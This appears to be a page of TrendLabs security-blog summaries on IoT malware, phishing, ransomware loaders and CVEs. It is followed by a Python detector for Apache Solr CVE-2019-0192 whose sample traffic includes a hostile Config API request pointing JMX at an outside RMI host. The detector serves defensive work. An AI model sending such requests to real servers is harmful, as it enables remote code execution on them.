Top IT Security Bloggers

TrendLabs - Malware Blog
  • Bashlite IoT Malware Updated with Mining and Backdoor Commands, Targets WeMo Devices
    We uncovered an updated Bashlite malware designed to add infected internet-of-things devices to a distributed-denial-of-service (DDoS) botnet. Based on the Metasploit module it abuses, the malware targets devices exposing the WeMo Universal Plug and Play (UPnP) application programming interface (API).
    This updated iteration of Bashlite is notable. For one, its arrival method is unusual: rather than exploiting a specific vulnerability (a security flaw assigned a CVE), it reuses a publicly available remote-code-execution (RCE) Metasploit module. It also sports additional DDoS-related commands and adds new ones that give the malware cryptocurrency-mining and backdoor capabilities, and it can deliver a payload that removes competing botnet malware.
  • New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy
    This new XLoader variant poses as a security app on Android devices and uses a malicious iOS configuration profile to target iPhones and iPads. Aside from the change in deployment technique, a few changes in its code set it apart from previous versions.
  • Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data
    Two zero-day vulnerabilities in current versions of Microsoft Edge and Internet Explorer allow confidential session data belonging to one website to be read by another.
  • Emotet-Distributed Ransomware Loader for Nozelesn Found via Managed Detection and Response
    By Erika Mendoza, Jay Yaneza, Gilbert Sison, Anjali Patil, Julie Cabuhat, and Joelson Soares
    Through our managed detection and response (MDR) monitoring, we discovered the modular Emotet malware distributing the Nymaim malware, which then loads the Nozelesn ransomware. We detected this particular Emotet variant in one of our monitored endpoints in the hospitality industry in...
  • Desktop, Mobile Phishing Campaign Targets South Korean Websites, Steals Credentials Via Watering Hole
    We discovered a phishing campaign that targets South Korean websites and their users' credentials using the watering hole technique. We labeled the campaign Soula. The cybercriminals injected malicious JavaScript into at least four websites so that a fake login pop-up appears at intervals and users must enter credentials before they can continue using the pages.
  • CVE-2019-0192: Mitigating Unsecure Deserialization in Apache Solr
    Security researcher Michael Stepankin reported a vulnerability in the popular open-source enterprise search platform Apache Solr: CVE-2019-0192. It is a critical vulnerability involving deserialization of untrusted data. To better understand how the vulnerability works, we replicated how it could be exploited in a potential attack using a publicly available proof of concept (PoC).
    Successfully exploiting this flaw lets an attacker execute arbitrary code in the context of the server application. An unauthenticated attacker can exploit CVE-2019-0192 by sending a specially crafted Hypertext Transfer Protocol (HTTP) request to the Config API, which lets Apache Solr users configure various elements of Solr (the settings otherwise held in solrconfig.xml). Affected versions are Apache Solr 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5. Apache's advisory lists upgrading to 7.0 or later, or running Solr with the system property disable.configEdit=true so the Config API cannot be written to, among the mitigations.
  • Telecom Crimes Against the IoT and 5G
    Telecommunications (telecom) technology underpins the modern internet and, consequently, the internet's fastest-growing segment, the internet of things (IoT). At its best, this relationship is exemplified by advances in network connectivity as we move to 5G. In our paper with Europol's European Cybercrime Centre (EC3), "Cyber-Telecom Crime Report 2019," we explore how this relationship can also be used to threaten and defraud the IoT.
  • CVE-2019-7238: Insufficient Access Controls in Sonatype Nexus Repository Manager 3 Allows Remote Code Execution
    A critical remote code execution (RCE) vulnerability, CVE-2019-7238, was found in Sonatype's Nexus Repository Manager (NXRM) 3, an open-source project that lets developers and DevOps teams manage the software components required for software development, application deployment, and automated provisioning.
  • A Machine Learning Model to Detect Malware Variants
    For malware that is difficult to discover and has few samples available for analysis, we propose a machine learning model that uses an adversarial autoencoder and semantic hashing to find what bad actors try to hide. We, together with researchers from Federation University Australia, describe this model in our study titled "Generative Malware Outbreak Detection."
  • March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild
    Microsoft's Patch Tuesday for March addressed 64 vulnerabilities: 17 rated critical, 45 important, one moderate, and one low in severity. Two of them, CVE-2019-0797 and CVE-2019-0808, were reported as actively exploited in the wild. The patches cover security flaws in a number of Microsoft products and services: .NET Framework, Edge, Exchange, Internet Explorer, Office, Office Services and Web Apps, NuGet, Team Foundation Server, and Windows. Seven of the vulnerabilities were disclosed through Trend Micro's Zero Day Initiative (ZDI).
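The CVE-2019-0192 item above describes the attack only as a crafted HTTP request to Solr's Config API. The following is an added example (not TrendLabs' or the Apache Solr project's code) of two checks a defender can run: a version test against the affected ranges the item lists, and a scan of HTTP request records for Config API writes that set jmx.serviceUrl. That property is the one the Apache advisory for this CVE names as the attack vector (pointing Solr's JMX server at a hostile RMI endpoint); the request records, hosts and paths below are constructed for the example, not captured traffic.

```python
"""Detection helpers for CVE-2019-0192 (Apache Solr Config API deserialization).

Added example, not code from TrendLabs or Apache Solr. The request records in
SAMPLE_REQUESTS are constructed; the jmx.serviceUrl mechanism comes from the
Apache advisory, the affected version ranges from the post summary above.
"""
import json
import re
from typing import Iterable, List, Tuple

# Affected ranges as stated in the post: 5.0.0-5.5.5 and 6.0.0-6.6.5 (inclusive).
AFFECTED_RANGES = [((5, 0, 0), (5, 5, 5)), ((6, 0, 0), (6, 6, 5))]

# Config API endpoint is per-core/collection: /solr/<core>/config
CONFIG_PATH = re.compile(r"^/solr/[^/]+/config(?:\?|$)")


def parse_version(v: str) -> Tuple[int, int, int]:
    """'6.6.5' or '6.6.5-SNAPSHOT' -> (6, 6, 5)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unparseable Solr version: {v!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected_version(v: str) -> bool:
    """True if the Solr version falls inside one of the affected ranges."""
    t = parse_version(v)
    return any(lo <= t <= hi for lo, hi in AFFECTED_RANGES)


def rmi_host(service_url: str) -> str:
    """service:jmx:rmi:///jndi/rmi://host:1099/obj -> 'host' ('' if none)."""
    m = re.search(r"rmi://([^/:]+)", service_url)
    return m.group(1) if m else ""


def _jmx_targets(body: dict) -> List[str]:
    """Collect jmx.serviceUrl values from Config API property commands.

    The Config API takes a JSON object of commands such as
    {"set-property": {"name": value}}; only string values are returned.
    """
    out: List[str] = []
    for cmd, params in body.items():
        if cmd.endswith("-property") and isinstance(params, dict):
            val = params.get("jmx.serviceUrl")
            if isinstance(val, str):
                out.append(val)
    return out


def find_jmx_config_writes(requests: Iterable[dict]) -> List[dict]:
    """Flag POSTs to a Config API path whose JSON body sets jmx.serviceUrl.

    Each request record is a dict with src, method, path and body keys
    (a shape assumed for this example, e.g. from a reverse-proxy log).
    """
    findings = []
    for r in requests:
        if r.get("method") != "POST" or not CONFIG_PATH.match(r.get("path", "")):
            continue
        try:
            body = json.loads(r.get("body") or "")
        except json.JSONDecodeError:
            continue  # not JSON: not a Config API command body
        if not isinstance(body, dict):
            continue
        for url in _jmx_targets(body):
            findings.append({"src": r.get("src"), "path": r["path"],
                             "jmx_host": rmi_host(url)})
    return findings


# Constructed sample traffic: a normal query, a benign config write, and a
# write that re-points JMX at an external RMI server (the CVE-2019-0192 shape).
SAMPLE_REQUESTS = [
    {"src": "10.0.0.7", "method": "GET",
     "path": "/solr/products/select?q=*:*", "body": ""},
    {"src": "10.0.0.7", "method": "POST", "path": "/solr/products/config",
     "body": '{"set-property": {"updateHandler.autoCommit.maxTime": 15000}}'},
    {"src": "203.0.113.9", "method": "POST", "path": "/solr/products/config",
     "body": '{"set-property": {"jmx.serviceUrl": '
             '"service:jmx:rmi:///jndi/rmi://203.0.113.9:1099/obj"}}'},
]

if __name__ == "__main__":
    for v in ("5.5.5", "6.6.5", "6.6.6", "7.7.1"):
        print(v, "affected" if is_affected_version(v) else "not affected")
    for f in find_jmx_config_writes(SAMPLE_REQUESTS):
        print("ALERT: Config API JMX write from", f["src"], "->", f["jmx_host"])
```

Any Config API write that sets jmx.serviceUrl is worth an alert regardless of the target host, since the property is rarely changed at runtime; a hit where the RMI host is not a loopback or management address is the strongest signal. On instances inside the affected ranges, the advisory's disable.configEdit=true switch removes the write path that makes the request useful in the first place.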